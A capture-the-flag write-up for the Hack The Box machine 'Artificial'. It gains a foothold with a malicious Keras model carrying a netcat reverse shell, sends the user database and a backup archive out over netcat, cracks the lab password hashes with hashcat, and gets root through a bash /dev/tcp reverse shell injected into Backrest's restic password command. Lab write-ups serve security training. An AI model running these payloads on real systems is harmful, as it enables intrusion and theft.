🧑🎨Artificial
https://app.hackthebox.com/machines/668
Recon
[*] Running initial Nmap scan...
sudo nmap -sCV -T4 <ip> -oA nmap-initial
[..]
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
| 256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
|_ 256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://artificial.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
FROM python:3.8-slim
WORKDIR /code
RUN apt-get update && \
apt-get install -y curl && \
curl -k -LO https://files.pythonhosted.org/packages/65/ad/4e090ca3b4de53404df9d1247c8a371346737862cfe539e7516fd23149a4/tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl && \
rm -rf /var/lib/apt/lists/*
RUN pip install ./tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
ENTRYPOINT ["/bin/bash"]User
Arbitrary Code Execution Vulnerability in the tensorflow-cpu library
➜ /opt/python-3.10.0/bin/python3.10 -m venv venv
➜ source ./venv/bin/activate
(venv) ➜ pip install -r requirements.txt
Collecting tensorflow-cpu==2.13.1
[..]import tensorflow as tf
import os
def exploit(x):
import os
os.system("rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc <ip> 1337 >/tmp/f")
return x
model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")(venv) ➜ python3 exploit.py
2025-06-24 15:39:06.771071: I tensorflow/core/platform/cpu_feature_guard.cc:182] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
/mnt/e/hacking/hackthebox/Season8/artificial/venv/lib/python3.10/site-packages/keras/src/engine/training.py:3000: UserWarning: You are saving your model as an HDF5 file via `model.save()`. This file format is considered legacy. We recommend using instead the native Keras format, e.g. `model.save('my_model.keras')`.
saving_api.save_model(
Upload the model and trigger shell by clicking view predictions after setting up the listener.
➜ rlwrap nc -nlvp 1337
listening on [any] 1337 ...
connect to [VPN] from (UNKNOWN) [IP] 48596
/bin/sh: 0: can't access tty; job control turned off
$ whoami
app
Transfering the users.db from the instance folder
➜ nc -lp 1234 > users.db
[after sending]
➜ ll users.db
-rw-r--r-- 1 kali kali 24K Jun 24 15:50 users.db
$ ls
users.db
$ nc -w 3 <ip> 1234 < users.db1 gael gael@artificial.htb c99175974b6e192936d97224638a34f8
2 mark mark@artificial.htb 0f3d8c76530022670f1c6029eed09ccb
3 robert robert@artificial.htb b606c5f5136170f15444251665638b36
4 royer royer@artificial.htb bc25b1f80f544c0ab451c02a3dca9fc6
5 mary mary@artificial.htb bf041041e57f1aff3be7ea1abd6129d0➜ cat hashes
c99175974b6e192936d97224638a34f8
0f3d8c76530022670f1c6029eed09ccb
b606c5f5136170f15444251665638b36
c25b1f80f544c0ab451c02a3dca9fc6
bf041041e57f1aff3be7ea1abd6129d0
➜ hashcat --identify hashes
The following 11 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
70 | md5(utf16le($pass)) | Raw Hash
2600 | md5(md5($pass)) | Raw Hash salted and/or iterated
3500 | md5(md5(md5($pass))) | Raw Hash salted and/or iterated
4400 | md5(sha1($pass)) | Raw Hash salted and/or iterated
20900 | md5(sha1($pass).md5($pass).sha1($pass)) | Raw Hash salted and/or iterated
4300 | md5(strtoupper(md5($pass))) | Raw Hash salted and/or iterated
1000 | NTLM | Operating System
9900 | Radmin2 | Operating System
8600 | Lotus Notes/Domino 5 | Enterprise Application Software (EAS)
➜ hashcat -m 0 -a 0 hashes /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
[...]
c99175974b6e192936d97224638a34f8:mattp005numbertwo ➜ ssh gael@artificial.htb
gael@artificial.htb's password: mattp005numbertwo
Warning: No xauth data; using fake authentication data for X11 forwarding.
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Tue 24 Jun 2025 01:55:57 PM UTC
System load: 0.11 Processes: 252
Usage of /: 63.6% of 7.53GB Users logged in: 1
Memory usage: 36% IPv4 address for eth0: ip
Swap usage: 0%
Expanded Security Maintenance for Infrastructure is not enabled.
0 updates can be applied immediately.
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
/usr/bin/xauth: file /home/gael/.Xauthority does not exist
Last login: Tue Jun 24 13:55:58 2025 from VPNIP
gael@artificial:~$ ls
user.txt
Root
gael@artificial:~$ netstat -tlpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9898 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:6010 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:6010 :::* LISTEN - gael@artificial:~$ systemctl list-units --type=service --state=active --no-legend | awk '{print $1}' | while read svc; do
> path=$(systemctl show -p FragmentPath --value "$svc")
> printf "%-50s %s\n" "$svc" "$path"
> done
accounts-daemon.service /lib/systemd/system/accounts-daemon.service
app.service /etc/systemd/system/app.service
apparmor.service /lib/systemd/system/apparmor.service
apport.service /run/systemd/generator.late/apport.service
atd.service /lib/systemd/system/atd.service
auditd.service /lib/systemd/system/auditd.service
backrest.service /etc/systemd/system/backrest.service
[..]
gael@artificial:~$ cat /etc/systemd/system/backrest.service
[Unit]
Description=Backrest Service
After=network.target
[Service]
Type=simple
User=root
Group=root
ExecStart=/usr/local/bin/backrest
Environment="BACKREST_PORT=127.0.0.1:9898"
Environment="BACKREST_CONFIG=/opt/backrest/.config/backrest/config.json"
Environment="BACKREST_DATA=/opt/backrest"
Environment="BACKREST_RESTIC_COMMAND=/opt/backrest/restic"
[Install]
WantedBy=multi-user.target
gael@artificial:~$ ll /var/backups/
total 51228
drwxr-xr-x 2 root root 4096 Jun 9 09:03 ./
drwxr-xr-x 13 root root 4096 Jun 2 07:38 ../
-rw-r--r-- 1 root root 39386 Jun 9 09:02 apt.extended_states.0
-rw-r--r-- 1 root root 4206 Jun 2 07:42 apt.extended_states.1.gz
-rw-r--r-- 1 root root 4190 May 27 13:07 apt.extended_states.2.gz
-rw-r--r-- 1 root root 4383 Oct 27 2024 apt.extended_states.3.gz
-rw-r--r-- 1 root root 4379 Oct 19 2024 apt.extended_states.4.gz
-rw-r--r-- 1 root root 4367 Oct 14 2024 apt.extended_states.5.gz
-rw-r--r-- 1 root root 4356 Sep 22 2024 apt.extended_states.6.gz
-rw-r----- 1 root sysadm 52357120 Mar 4 22:19 backrest_backup.tar.gz
➜ artificial nc -lp 1234 > backup.tar.gzgael@artificial:~$ nc -w 3 <ip> 1234 < /var/backups/backrest_backup.tar.gz {
"modno": 2,
"version": 4,
"instance": "Artificial",
"auth": {
"disabled": false,
"users": [
{
"name": "backrest_root",
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
}
]
}
}
➜ echo 'JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP' | base64 -d | tee hash
$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO%
➜ backrest hashcat --identify hash
The following 4 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
➜ hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO:!@#$%^
➜ backrest ssh -L9898:127.0.0.1:9898 gael@artificial.htb
gael@artificial.htb's password: mattp005numbertwo
Warning: No xauth data; using fake authentication data for X11 forwarding.
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Tue 24 Jun 2025 02:22:39 PM UTC
System load: 0.11 Processes: 269
Usage of /: 59.0% of 7.53GB Users logged in: 2
Memory usage: 34% IPv4 address for eth0: IP
Swap usage: 0%
Expanded Security Maintenance for Infrastructure is not enabled.
0 updates can be applied immediately.
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jun 24 14:22:40 2025 from VPN
gael@artificial:~$
Creating a new repo with env vars
RESTIC_PASSWORD_COMMAND=bash -c 'bash -i >& /dev/tcp/<ip>/1338 0>&1'
➜ sorcery rlwrap nc -nlvp 1338
listening on [any] 1338 ...
[after submitting repo]
connect to [VPN] from (UNKNOWN) [IP] 53282
bash: cannot set terminal process group (41424): Inappropriate ioctl for device
bash: no job control in this shell
root@artificial:/# whoami
whoami
root
Last updated